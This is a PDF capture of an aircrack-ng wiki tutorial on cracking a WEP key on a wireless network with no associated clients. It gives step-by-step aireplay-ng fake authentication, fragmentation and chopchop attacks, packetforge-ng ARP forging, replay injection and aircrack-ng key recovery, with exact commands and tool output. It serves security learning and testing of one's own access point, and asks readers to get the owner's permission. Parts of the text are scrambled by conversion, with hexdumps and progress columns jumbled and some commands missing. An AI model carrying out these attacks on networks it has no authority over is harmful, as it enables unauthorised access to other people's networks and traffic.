Tutorial: How To Crack WEP With No Wireless Clients
Tutorial: How To Crack WEP With No Wireless Clients
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
Introduction
There are many times when a wireless network has no wireless clients associated with it and there are no ARP requests coming from the wired side. This tutorial describes how to crack the WEP key when there are no wireless clients and there are no ARP requests coming from the wired side. Although this topic has been discussed many times over in the Forum [http://forum.aircrack-ng.org], this tutorial is intended to address the topic in more detail and provide working examples. If there ARP requests being broadcast from the wire side, then the standard fake authentication combined with ARP request replay technique may be used. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. I would like to acknowledge and thank the Aircrack-ng team [http://trac.aircrack-ng.org/wiki/Team] for producing such a great robust tool. Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions
First, this solution assumes: You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding. You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions. There are some data packets coming from the access point. Beacons and other management frame packets are totally useless for our purposes in this tutorial. A quick way to check is to run airodump-ng and see if there are any data packets counted for the access point. Having said that, if you have data captured from the access point from another session, then this can be used. This is an advanced topic and this tutorial does not provide detailed instructions for this case. The access point uses WEP open authentication. It will not work if shared key authentication (SKA) is being used. With SKA, the only way to be successful with no clients present is if you captured the PRGA xor data with a airodump-ng handshake or an aireplay-ng attack previously. This is because you will need the PRGA xor file to do the fake authentication successfully. You use the native MAC address of your wireless card for all the steps and do not change it. Do NOT use any other MAC address as the source for transmitting packets. Otherwise, some commands will not work correctly. See the Using Another Source MAC Address Section for instructions on dealing with using a different source
1 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
MAC address. You are using v0.9 of aircrack-ng. If you use a different version then some of the command options may have to be changed. Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.
Equipment used
In this tutorial, here is what was used: MAC address of PC running aircrack-ng suite: 00:09:5B:EC:EE:F2 BSSID (MAC address of access point): 00:14:6C:7E:40:80 ESSID (Wireless network name): teddy Access point channel: 9 Wireless interface: ath0 You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview
Here are the basic steps we will be going through: 1 - Set the wireless card MAC address 2 - Start the wireless interface in monitor mode on the specific AP channel 3 - Use aireplay-ng to do a fake authentication with the access point 4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA 5 - Use packetforge-ng to create an arp packet using the PRGA obtain in the previous step 6 - Start airodump-ng on AP channel with filter for bssid to collect the new unique IVs 7 - Inject the arp packet created in step 5 8 - Run aircrack-ng to crack key using the IVs collected
Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers
2 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
are being used. For other drivers, use the actual interface name. The system will respond:
Interface wifi0 ath0 Chipset Atheros Atheros Driver madwifi-ng madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
You will notice that ath0 is reported above as being put into monitor mode. To confirm the interface is properly setup, enter iwconfig. The system will respond:
lo eth0 wifi0 ath0 no wireless extensions. no wireless extensions. no wireless extensions. IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:09:5B:EC:EE:F2 Bit Rate:0 kb/s Tx-Power:15 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. (Note: If you are using a driver other than madwifi, then the Access Point field will be either invisible or show something other than your card's MAC address. This is normal.) To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel [http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide /deployment/guide/Channel.html#wp134132 /Channel.html#wp134132] . This will give you the frequency for each channel.
Troubleshooting Tips
If another interface started other than ath0 then stop all of them first by using airmon-ng stop athX where X is each interface you want to stop. On mac80211-based drivers, airmon-ng will respond with something like this:
Interface wlan0 Chipset Broadcom 43xx Driver b43 - [phy0] (monitor mode enabled on mon0)
For such interfaces, use the interface name after monitor mode enabled on (here mon0) for further commands, rather than your card's actual interface.
3 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
address you are injecting is not associated then the AP ignores the packet and sends out a DeAuthentication packet. In this state, no new IVs are created because the AP is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why injection fails. To associate with an access point, use fake authentication:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Where: -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is our card MAC address ath0 is the wireless interface name Success looks like:
18:18:20 18:18:20 18:18:20 18:18:20 Sending Authentication Request Authentication successful Sending Association Request Association successful :-)
Where: 6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent. -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs. -q 10 - Send keep alive packets every 10 seconds. Success looks like:
18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet # and so on.
Notice the Got a deauthentication packet and the continuous retries above. Do not proceed to the next step until you
4 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. See the MAC access control troubleshooting tip here. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and Run:
tcpdump -n -e -s0 -vvv -i ath0
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth. You may need to tweak the phrase DeAuth to pick out the exact packets you want.
Where: -5 means the fragmentation attack -b 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication ath0 is the wireless interface name The system will respond:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Waiting for a data packet... Read 127 packets... Size: 114, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 01:00:5E:00:00:FB Source MAC = 00:40:F4:77:E5:C9
5 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0x0060: 0x0070: 0842 0040 c402 4e9e 8244 4563 c531 9c9f 0000 f477 790b 5e13 5882 906d e214 0100 e5c9 2293 5f43 d5cc 0d90 2b28 5e00 6052 c7d5 4ff5 7a1f 88c4 fc19 00fb 8c00 89c5 1b37 2b9b 5532 b9a8 0014 0000 4136 3ff9 3ef0 a602 226d 6c7e 3073 7283 4da4 ee0f a8ea 9c71 4080 d265 29df c03b 4fb5 f8e2 6ab1
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
.B....^.....l~@. .@.w..`R....0s.e ..y.".....A6r.). N.^._CO..7?.M..; .DX...z.+.>...O. Ec.m....U2...... .1..+(...."m.qj. ..
When a packet from the access point arrives, enter y to proceed. You may need to try a few different packets from the AP to be successful. These packets have FromDS: 1. When successful, the system responds:
Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Success! The file fragment-0203-180343.xor can then be used in the next step to generate an arp packet. If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:
aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
Where: -4 means the chopchop attack -h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication -b 00:14:6C:7E:40:80 is the access point MAC address ath0 is the wireless interface name The system responds:
Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0040 e2ee d1ca 16d4 cfeb 0000 f477 aa48 0c9b 43fb 4a72 ffff e5c9 8312 6aeb aebb be46 ffff 603a f59d fad6 3ea1 ffff d600 c8c0 f394 7101 0014 0000 af5f 2591 729e 6c7e 5fed 3dd8 5bf4 65ca 4080 a222 a543 2873 6905 .B..........l~@. .@.w..`:...._.." ...H......._=..C ....j.....%.[.(s ..C...>.q.r.e.i. ..Jr.F
6 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
Saving chosen packet in replay_src-0201-191639.cap Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Sent 957 85 ( 0% done) | xor = D3 | pt 84 ( 1% done) | xor = EB | pt 83 ( 3% done) | xor = 47 | pt 82 ( 5% done) | xor = 07 | pt 81 ( 7% done) | xor = EB | pt 80 ( 9% done) | xor = CF | pt 79 (11% done) | xor = 05 | pt 78 (13% done) | xor = 69 | pt 77 (15% done) | xor = CA | pt 76 (17% done) | xor = 65 | pt 75 (19% done) | xor = 9E | pt 74 (21% done) | xor = 72 | pt 73 (23% done) | xor = 01 | pt 72 (25% done) | xor = 71 | pt 71 (26% done) | xor = A1 | pt 70 (28% done) | xor = 3E | pt 69 (30% done) | xor = BB | pt 68 (32% done) | xor = AE | pt 67 (34% done) | xor = FB | pt 66 (36% done) | xor = 43 | pt 65 (38% done) | xor = D4 | pt 64 (40% done) | xor = 16 | pt 63 (42% done) | xor = 7F | pt 62 (44% done) | xor = 1F | pt 61 (46% done) | xor = 5C | pt 60 (48% done) | xor = 9B | pt 59 (50% done) | xor = 91 | pt 58 (51% done) | xor = 25 | pt 57 (53% done) | xor = 94 | pt 56 (55% done) | xor = F3 | pt 55 (57% done) | xor = D6 | pt 54 (59% done) | xor = FA | pt 53 (61% done) | xor = EA | pt 52 (63% done) | xor = 5D | pt 51 (65% done) | xor = 33 | pt 50 (67% done) | xor = CC | pt 49 (69% done) | xor = 03 | pt 48 (71% done) | xor = 34 | pt 47 (73% done) | xor = 34 | pt 46 (75% done) | xor = 51 | pt 45 (76% done) | xor = 98 | pt 44 (78% done) | xor = 3D | pt 43 (80% done) | xor = 5E | pt 42 (82% done) | xor = AF | pt 41 (84% done) | xor = C4 | pt 40 (86% done) | xor = CE | pt 39 (88% done) | xor = 9D | pt 38 (90% done) | xor = FD | pt 37 (92% done) | xor = 13 | pt 36 (94% done) | xor = 83 | pt 35 (96% done) | xor = 4E | pt packets, current guess: B9... = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 95 55 35 4D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 37 A8 C0 00 00 00 00 00 00 01 37 A8 C0 C9 E5 77 F4 40 00 01 00 04 06 00 08 01 00 06 | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | 253 166 215 161 12 152 29 151 24 129 36 39 146 83 43 98 129 248 105 101 158 197 72 166 119 229 113 184 33 193 17 81 95 24 20 97 188 48 64 253 109 242 194 99 164 69 137 229 232 19 230 frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in 760ms 498ms 645ms 483ms 36ms 456ms 87ms 454ms 71ms 387ms 108ms 117ms 438ms 249ms 129ms 294ms 387ms 744ms 315ms 303ms 474ms 591ms 217ms 497ms 357ms 687ms 339ms 552ms 99ms 579ms 51ms 243ms 285ms 72ms 59ms 291ms 566ms 142ms 192ms 759ms 327ms 726ms 583ms 296ms 492ms 207ms 411ms 688ms 695ms 58ms 689ms
The AP appears to drop packets shorter than 35 bytes. Enabling standard workaround: ARP header re-creation. Saving plaintext in replay_dec-0201-191706.cap Saving keystream in replay_dec-0201-191706.xor Completed in 21s (2.29 bytes/s)
Success! The file replay_dec-0201-191706.xor above can then be used in the next step to generate an arp packet.
Helpful Tips
Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to equal or greater then the packet length we want to generate.
7 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast and this will show up in chopchop to be used. You can check the decrypted packet by running tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.cap. In our example above: reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11) 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.1.12 tell 192.168.1.1 If something happens part way through chopchop, you can reuse the source packet by entering aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r replay_src-0201-191639.cap. The replay source file is noted when chopchop starts. Taking the previous tip further, if you have a capture file from another session, you can use it as input aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r capture-from-some-other-time.cap
Troubleshooting Tips
If the first packet you select does not work, then try a few others. Sometimes it takes more then one try to be successful with either attack. The chopchop attack will not be successful on some access points. If this happens, move onto the fragmentation attack. And vice versa. Make sure you are properly associated. To check this, follow the tcpdump instructions in step 2.
Where: -0 means generate an arp packet -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is MAC address of our card -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255) -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255) -y fragment-0203-180343.xor is file to read the PRGA from (NOTE: Change the file name to the actual file name out in step 4 above) -w arp-request is name of file to write the arp packet to The system will respond:
Wrote packet to: arp-request
Helpful Tips
After creating the packet, use tcpdump to review it from a sanity point of view. See below. It looks good!
8 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
reading from file arp-request, link-type IEEE802_11 (802.11) 10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct. These steps are not required, they just prove to yourself that you have generated the correct packet. Decrypt the packet:
airdecap-ng -e teddy -w <put your WEP key here> arp-request
Where: -c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will contain the captured packets. ath0 is the interface name.
Where: -2 means use interactive frame selection -r arp-request defines the file name from which to read the arp packet ath0 defines the interface to use The system will respond:
Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID Dest. MAC Source MAC 0x0000: = = = 00:14:6C:7E:40:80 FF:FF:FF:FF:FF:FF 00:09:5B:EC:EE:F2 .A....l~@...[...
9 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
0x0010: 0x0020: 0x0030: 0x0040: ffff c587 f286 6ada ffff ffff 8001 8f00 0000 7af3 8be4 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 fdb3 55ee 113e da14 fb19 17cc 0b5e 92f2
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
............z... ...........q.Z8. ....U..>.......^ j...
Enter y to use this packet. The system responds by showing how many packets it is injecting and reminds you to start airodump-ng if it has not already been started:
Saving chosen packet in replay_src-0204-104917.cap You should also start airodump-ng to capture replies. End of file.
While this command is successfully running, the airodump-ng screen will look similar to:
CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04 PWR RXQ 47 100 STATION 00:09:5B:EC:EE:F2 Beacons 179 #Data, #/s 2689 PWR 29 336 CH 9 MB 11 ENC WEP Probes CIPHER AUTH ESSID WEP teddy
Lost 0
Packets 2707
You will notice that only one access point is being display since we included an airodump-ng filter to limit the capture to a single BSSID. Also notice that the station packets are roughly equal to the BSSID data packets. This means injection is working well. Also notice the data rate of 336 packets per second which is also an indicator that the injection is working well. This is a pretty ideal injection scenario.
Troubleshooting Tips
If the BSSID data packets are not increasing, make sure you are still associated with the access point. To do this, follow the tcpdump instructions in step 2.
Where: capture*.cap selects all dump files starting with capture and ending in cap. -b 00:14:6C:7E:40:80 selects the one access point we are interested in You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the --ivs option. Troubleshooting Tips: Sometimes you need to try various techniques to crack the WEP key. Try -n to set various key lengths. Use -f and try various fudge factors. Use -k and try disabling various korek methods.
10 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
Alternate Solution
There is a neat trick which simplifies cracking WEP with no clients. Essentially it takes any packet broadcast by the access point and converts it to a broadcast packet such that the access point generates a new IV. OK, at this point you are asking why didn't you show me this technique right at the start? The reason is that this technique rebroadcasts whatever size packet you receive. So if you receive a 1000 byte packet you then rebroadcast 1000 bytes. This potentially slows down the packets per second rate considerably. However, on the good news side, it is simple and easy to use. You might also get lucky and receive a very small packet for rebroadcasting. In this case, the performance is comparable to the solution described above. The same assumptions apply and you must also do a successful fake authentication first. Enter the following command:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Where: -2 means use interactive frame selection -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. -c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV. -b 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication ath0 defines the interface to use The system will respond:
Read 698 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID Dest. MAC Source MAC 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: = = = 00:14:6C:7E:40:80 FF:FF:FF:FF:FF:FF 00:D0:CF:03:34:8C 0000 cf03 fe67 d7b0 a308 09f6 ffff 348c 41e0 a56f 6a70 5418 ffff a0f4 9dd5 bc16 4465 ffff 2000 7271 355f 9fa6 0014 0000 b8ed 8986 5467 6c7e e233 ed23 a7ab d588 4080 962a 8eda d495 c10c .B..........l~@. ....4... ....3.* ...gA...rq...#.. .U...o..5_...... ....jpDe..Tg.... .C..T.
You enter y to select the packet and start injecting it. Remember, the smaller the packet, the better. You then start injecting:
Saving chosen packet in replay_src-0411-145110.cap Sent 10204 packets...(455 pps)
If you have not already started airodump-ng, be sure to start it now. Once you have sufficient IVs, you can start aircrack-ng and attempt to crack the WEP key. Another variation of this attack is to use packets from a previous capture. You must have captured the full packets, not just the IVs.
11 of 12
05/06/2012 07:09 PM
how_to_crack_wep_with_no_clients [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=how_to_crack_...
Except where otherwise noted, content on this wiki is licensed under the following license:CC AttributionNoncommercial-Share Alike 3.0 Unported [http://creativecommons.org/licenses/by-nc-sa/3.0/]
12 of 12
05/06/2012 07:09 PM